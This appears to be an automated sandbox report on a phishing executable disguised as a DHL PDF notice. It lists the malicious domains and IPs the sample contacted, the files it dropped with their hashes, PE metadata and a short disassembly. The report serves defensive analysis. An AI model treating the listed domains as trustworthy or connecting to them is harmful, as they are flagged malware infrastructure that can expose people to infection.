                                    http://www.admet01.clubexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.adoptiveimmunotech.com/hpb7/jexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.bisarropainting.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                      		high
                                      http://www.madliainsalu.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kotelak.ruReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rifleroofers.comexplorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.denko-kosan.comexplorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.madliainsalu.com/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.mindsetlighting.xyzReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rifleroofers.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.buymyenergy.com/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=146E771M.5.drfalse
                                        		high
                                        http://www.denko-kosan.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                          		high
                                          http://www.adoptiveimmunotech.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://nsis.sf.net/NSIS_ErrorErrorDHL_Notification_pdf.exefalse
                                            		high
                                            http://www.creative-shield.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                              		high
                                              http://www.adoptiveimmunotech.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.creative-shield.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=146E771M.5.drfalse
                                                		high
                                                https://search.yahoo.com?fr=crmas_sfpcmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drfalse
                                                  		high
                                                  http://www.traindic.topexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.admet01.club/hpb7/explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.yongleproducts.com/hpb7/explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://rifleroofers.com/hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1explorer.exe, 00000004.00000002.523730403.00000000157A4000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.510648252.0000000005E94000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bisarropainting.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.bohndigitaltech.comReferer:explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=146E771M.5.drfalse
                                                    		high
                                                    http://www.bisarropainting.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.yongleproducts.comexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mindsetlighting.xyzexplorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    198.46.160.97
                                                    		www.0dhy.xyzUnited States
                                                    		36352AS-COLOCROSSINGUStrue
                                                    67.222.24.48
                                                    		rifleroofers.comUnited States
                                                    		63410PRIVATESYSTEMSUStrue
                                                    49.212.180.95
                                                    		denko-kosan.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                    1.13.186.125
                                                    		www.yongleproducts.comChina
                                                    		13335CLOUDFLARENETUStrue
                                                    162.241.24.110
                                                    		bohndigitaltech.comUnited States
                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                    219.94.129.181
                                                    		kunimi.orgJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                    162.0.231.77
                                                    		www.traindic.topCanada
                                                    		22612NAMECHEAP-NETUStrue

                                                    General Information

                                                    Joe Sandbox Version:37.0.0 Beryl
                                                    Analysis ID:830435
                                                    Start date and time:2023-03-20 11:27:15 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 22s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:16
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:DHL_Notification_pdf.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@8/5@12/7
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 71.7% (good quality ratio 66.2%)
                                                    • Quality average: 75.2%
                                                    • Quality standard deviation: 30.7%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:28:23API Interceptor619x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\146E771M

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\cmmon32.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                    Category:modified
                                                    Size (bytes):94208
                                                    Entropy (8bit):1.2889923589460437
                                                    Encrypted:false
                                                    SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                    MD5:7901DD9DF50A993306401B7360977746
                                                    SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                    SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                    SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\ldndbi.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:modified
                                                    Size (bytes):95744
                                                    Entropy (8bit):6.22620721848125
                                                    Encrypted:false
                                                    SSDEEP:1536:X0ZlV4KXc4OxQEsGZDmS+jtBaK/eRuZocSZUpxwkyBp+NnFsSW81kxgsWJjcdvhk:Ed4KALsGZDN+x/yuZocSTkyBw9y8eASK
                                                    MD5:C99B9B59B44F7789DD46E5230C22A9CD
                                                    SHA1:A4551975A1003A0309AE3EEF35FF0183E388707B
                                                    SHA-256:FC5D8E04A8C7A63B993963ABB0A4BA5DD1203818CCA5A04221A0E0470F2A3D1A
                                                    SHA-512:DE8ED5C68B001D32D71DFAE1D9A30D1128848131F77A2FDD64B5E8C047D0E796B52335033F718BC89F0BFEED15517AE038468D227F4ED4A43E63CB51BD75F79E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 19%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s...s...s...8...y...8.......8...g......U......b......`...8...j...s...........r.......r...Richs...........PE..L......d...............!.....|......".............@.........................................................................|k.......................................^...............................]..@............................................text............................... ..`.rdata...f.......h..................@..@.data...l............l..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\nsw10F5.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):326174
                                                    Entropy (8bit):7.563897951059429
                                                    Encrypted:false
                                                    SSDEEP:6144:1d/7iDj8MH9T02nVWHI/MPkICJa6D22lOqwNjuGKGsGZExocCm:PgjH9A2UH05ICwjw/wNjuGKGsHG
                                                    MD5:E835C61DF57229CDB9D3E96D0C7E8201
                                                    SHA1:79E878C0BD2109C17F1273D61856822AFE949E60
                                                    SHA-256:5F43497768944110E3B665872721D20A11F40A0691DD6FCA543A782FE47060D3
                                                    SHA-512:42E90C700FDBAD71D280F1755DEF646BA74AB2D0485F5B07DBF4E6F4FB843C378B923D1049F17CE10C0BE52770418813E82BBE028938BBFEC3EA45882344E22E
                                                    Malicious:false
                                                    Preview:X7......,...................t....&.......6......X7..........................................................................................................................................................................................................................................G...................j...............................................................................................................................L...........6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\qlqjt.de

                                                    Download File
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):5950
                                                    Entropy (8bit):7.1560009193344385
                                                    Encrypted:false
                                                    SSDEEP:96:Farc6oYhg/DrYuAk2XO5oSw0i3D9pdn4m3dwnHgzU15FE9ORPmCsCmbvrfjXC:FarcRRIhX1SJaDNn4maAzU15gJLrLXC
                                                    MD5:A994E285DD19803FB9EC4341608FA3BD
                                                    SHA1:D5D88C4A0C0DD00CF6120AAC684492BC28203088
                                                    SHA-256:95E31DD67CAED4C3E24EAA150BBF40B380AE7DCB308639D45539675A66D827E4
                                                    SHA-512:3BEAFB9225621703067B76099FCA5A9D012F9CB9078F2FB32B6EB803EA2BCE7E6D75598D5DADA3D721F50CA67FFBA3850BCB21A3AADAB73414052F3A03B8E1C6
                                                    Malicious:false
                                                    Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                    C:\Users\user\AppData\Local\Temp\tfnqr.hy

                                                    Download File
                                                    Process:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210296
                                                    Entropy (8bit):7.998895711202933
                                                    Encrypted:true
                                                    SSDEEP:6144:kd/7iDj8MH9T02nVWHI/MPkICJa6D22lOq4:mgjH9A2UH05ICwjw/4
                                                    MD5:1A4214B2D0C61B85EAB942BAA8B90A45
                                                    SHA1:48AEB34FBB99C2AC55961F17F84E1C3EE0740EAF
                                                    SHA-256:B12B5EB17E8DC4DBC3A9FB16736BCE60E097346E9236719508118510CC9092E1
                                                    SHA-512:E1BD0FA394F3B555A43D62C294EEA6385AE57A1254994FA34644DABFD6BB4208E16A032DA00C8656FC1AEDC9A57DD3FA72599B03FF098FC39EC085B4C90E445C
                                                    Malicious:false
                                                    Preview:.%A.....<^...dz3..'..k.Vp.....;J..8.ubm._rl./.h....1..&..Xg.5JN.....P.%A.h.j.\...8..j.......T...y!..:...s....E.V"..9.R,..r~.X.~...b.EE.&.jt...KG.>.J.p..f..*.r.\M..........!..V..Xv).Y..a"..............J..\..j.T.....@.T.V.s...r...u..&A.vR_.8B..KR.G.L.......W...N.X.'..P-..s...-J.8..bm._#l.#.h....H1..&..Xh.5J..A...,YY.).=....|df.!..\.....].. ..i...3../[..M.kX....."..9.R,..T.P....*z.............F.Q*.U...].....l...x.......!..\...v).1.ba..8..........J....=LT/....@.T.V.s-..r.r.u..sA.v._..B...R.?.L.......W...N.T'.h.P-..s...;J..8.ubm._rl./.h....1..&..Xh.5J..A...,YY.).=....|df.!..\.....].. ..i...3../[..M.kX....."..9.R,..T.P....*z.............F.Q*.U...].....l...x.......!..V..Xv)....a..8...........J....=LT.....@.T.V.s-..r.r.u..sA.v._..B...R.?.L.......W...N.T'.h.P-..s...;J..8.ubm._rl./.h....1..&..Xh.5J..A...,YY.).=....|df.!..\.....].. ..i...3../[..M.kX....."..9.R,..T.P....*z.............F.Q*.U...].....l...x.......!..V..Xv)....a..8...........J....=LT.....@.T.V.s

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.92568389123595
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:DHL_Notification_pdf.exe
                                                    File size:299346
                                                    MD5:06f7894017e8f6737d228adc14480c83
                                                    SHA1:fab1cbdbbb5fc2e76de2622948a02c3e8af17c18
                                                    SHA256:bbfb2aacf1ff431d0ed71b54c499d3a56b6bcc90d5137cd78097b40c354c2353
                                                    SHA512:a88448b4853746bb49d2640e5f23796187e6234f744ee006c687e93197f9dee86cf826259b2480879dcf00dad0b98355dd49298ece63f0bc32f1d356b3f3d8d6
                                                    SSDEEP:6144:PYa6brXt83aw4ZaNEQRd0SyjNmzvw/gAn/lfVuMqs6sV3jQl:PYRrXtCJ4Zazd0SyxEvwYA/l9l6s1je
                                                    TLSH:C654128023E4C4EADCE10E316E3ADAAEA5FFDA251064564F37953F8679617D2DD0E302
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                    File Icon

                                                    Icon Hash:b2a88c96b2ca6a72

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x403640
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:61259b55b8912888e90f516ca08dc514

                                                    Entrypoint Preview

                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 000003F4h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [ebp-14h], ebx
                                                    mov dword ptr [ebp-04h], 0040A230h
                                                    mov dword ptr [ebp-10h], ebx
                                                    call dword ptr [004080C8h]
                                                    mov esi, dword ptr [004080CCh]
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    push eax
                                                    mov dword ptr [ebp-0000012Ch], ebx
                                                    mov dword ptr [ebp-2Ch], ebx
                                                    mov dword ptr [ebp-28h], ebx
                                                    mov dword ptr [ebp-00000140h], 0000011Ch
                                                    call esi
                                                    test eax, eax
                                                    jne 00007FA6B0ABA0EAh
                                                    lea eax, dword ptr [ebp-00000140h]
                                                    mov dword ptr [ebp-00000140h], 00000114h
                                                    push eax
                                                    call esi
                                                    mov ax, word ptr [ebp-0000012Ch]
                                                    mov ecx, dword ptr [ebp-00000112h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [ebp-26h], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [ebp-2Ch], ax
                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                    jnc 00007FA6B0ABA0BAh
                                                    and word ptr [ebp-00000132h], 0000h
                                                    mov eax, dword ptr [ebp-00000134h]
                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                    mov dword ptr [0042A318h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [ebp-2Ch]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx

                                                    Rich Headers

                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xce8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x3b0000xce80xe00False0.4224330357142857data4.238068683037627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                    RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                    RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                    RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                    RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                    RT_VERSION0x3b7580x24cdataEnglishUnited States
                                                    RT_MANIFEST0x3b9a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

